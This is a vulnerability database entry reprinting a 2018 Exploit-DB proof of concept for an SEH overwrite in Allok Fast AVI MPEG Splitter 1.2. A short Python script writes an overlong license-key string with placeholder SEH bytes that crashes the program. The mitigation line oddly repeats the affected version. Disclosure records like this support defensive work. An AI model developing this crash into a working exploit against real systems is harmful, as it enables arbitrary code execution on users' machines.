Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite POC

vendor:

Fast AVI MPEG Splitter

by:

Shubham Singh

7.8

CVSS

HIGH

SEH Overwrite POC

119

CWE

Product Name: Fast AVI MPEG Splitter

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: YES

Related CWE: N/A

CPE: a:alloksoft:fast_avi_mpeg_splitter:1.2

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows XP Service Pack 3 x86

2018

Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite POC

Allok Fast AVI MPEG Splitter 1.2 is vulnerable to a SEH overwrite vulnerability. This vulnerability can be exploited by an attacker to execute arbitrary code in the context of the application. The vulnerability is triggered when a specially crafted license key is entered into the application. This causes the application to crash and allows an attacker to overwrite the SEH handler with arbitrary code.

Mitigation:

Upgrade to the latest version of Allok Fast AVI MPEG Splitter 1.2 or apply the vendor-supplied patch.

Source

Exploit-DB raw data:

# Exploit Title: Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite POC 
# Vulnerability Type: SEH Overwrite POC
# Discovery by: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Discovey Date: 2018-08-01
# Software Link: http://www.alloksoft.com/fast_splitter.htm 
# Tested Version: 1.2
# Tested on OS: Windows XP Service Pack 3 x86

# Steps to Reproduce: 
# Run the python exploit.py , Open "exploit.txt" and copy content.
# Open Fast AVI MPEG Splitter , A registration prompt will appear.
# In the License field paste the content of "exploit.txt".
# Press "OK" and B00m Crashed.

#!/usr/bin/env python

# SEH chain of main thread, item 0
# Address=00129B78
# SE handler=43434343
# SEH chain of main thread, item 1
# Address=42424242
# SE handler=*** CORRUPT ENTRY ***
 
buffer = "\x41" * 544
nseh = "\x42\x42\x42\x42"
seh= "\x43\x43\x43\x43" 

exploit = buffer + nseh + seh 
f = open ("exploit.txt", "w")
f.write(exploit)
f.close()